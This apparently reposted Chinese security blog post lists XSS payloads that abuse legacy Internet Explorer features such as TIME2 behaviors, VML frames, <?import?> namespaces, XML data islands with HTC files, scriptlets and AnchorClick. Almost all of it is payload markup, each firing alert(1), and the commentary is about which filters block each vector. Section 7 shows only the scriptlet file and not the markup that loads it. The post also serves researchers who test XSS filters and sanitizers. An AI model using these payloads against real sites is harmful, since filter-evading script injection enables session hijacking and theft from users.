通过HTML,XML,VML,TIME,相关来执行XSS -寒龙关注网络安全 欢迎关注

. time attributename 和 values 联用

 
<html xmlns:t="urn:schemas-microsoft-com:time">
<body>
<div title="alert(1);" id="myxss">xxx</div>
<div>
<t:animate style="behavior:url(#default#time2)" attributename="innerhtml"
 
values="&lt;img/src=&quot;.&quot;style=&quot;display:none&quot;onerror=eval(myxss.title)&gt;"></t:animate>
</div>
</body>
</html>直接在元素上使用:
 
防止单行代码看不见
 
<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(1)&gt;>
 
防止单行代码看不见
2. time onbegin ,比较鸡肋的地方是,只要有onxxx过滤器的,就没啥用
 
<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >
 
3. time set attributename to
 
<html xmlns:t="urn:schemas-microsoft-com:time">
<body>
<div title="alert(1);" id="myxss">xxx</div>
<div>
<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41;vior:url(#default#time2)` attributename=`innerhtml`
 
to=`&lt;img/src=&quot;x&quot;onerror=alert(1)&gt;`>
</div>
</body>
</html>
 
4. vml onmouseover 触发
 
<html xmlns:t="urn:schemas-microsoft-com:time">
<body>
<div title="alert(1);" id="myxss">xxx</div>
<div>
1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100%
 
src=test.vml#xss></vmlframe>
</div>
</body>
</html>所调用的test.vml
 
<xml>
<rect style="height:100%;width:100%" id="xss" onmouseover="alert(1)" strokecolor="white" strokeweight="2000px" filled="false" />
</xml>5. 另类的time , html/xml + import组合
 
<html>
<body>
<div>
<div id="x">x</div>
<?xml:namespace prefix="t">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(1)&gt;">
</div>
</body>
</html>xml, import 不要? 也可以
 
?01020304050607080910 <html> <body> <div> <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(1)&gt;"> </div> </body> </html>
 
或者 html + import 组合
 
<html xmlns:t>
<body>
<div>
<div id="x">x</div>
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(1)&gt;">
</div>
</body>
</html>6. xml+htc组合
 
<html>
<body>
<div>
<xml id="xss" src="test.htc"></xml>
<label dataformatas="html" datasrc="#xss" datafld="payload"></label>
</div>
</body>
</html>test.htc文件
 
<?xml version="1.0"?>
<x>
<payload><![CDATA[<img src=x onerror=alert(1)>]]></payload>
</x>7. style + scriptlet组合
 
 
test.sct代码
 
<SCRIPTLET>
<IMPLEMENTS Type="Behavior"></IMPLEMENTS>
<SCRIPT Language="javascript">alert(1)</SCRIPT>
</SCRIPTLET>8. AnchorClick + folder , (需点击链接执行)
 
防止单行代码看不见
 
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>
 
防止单行代码看不见总结: behavior 很危险,有木有!! import 在style里也危险,作为标记<import ..> or <?import …> 还是很危险~

通过HTML,XML,VML,TIME,相关来执行XSS -寒龙关注网络安全 欢迎关注,布布扣,bubuko.com

通过HTML,XML,VML,TIME,相关来执行XSS -寒龙关注网络安全 欢迎关注

上一篇:CSS备忘


下一篇:HTML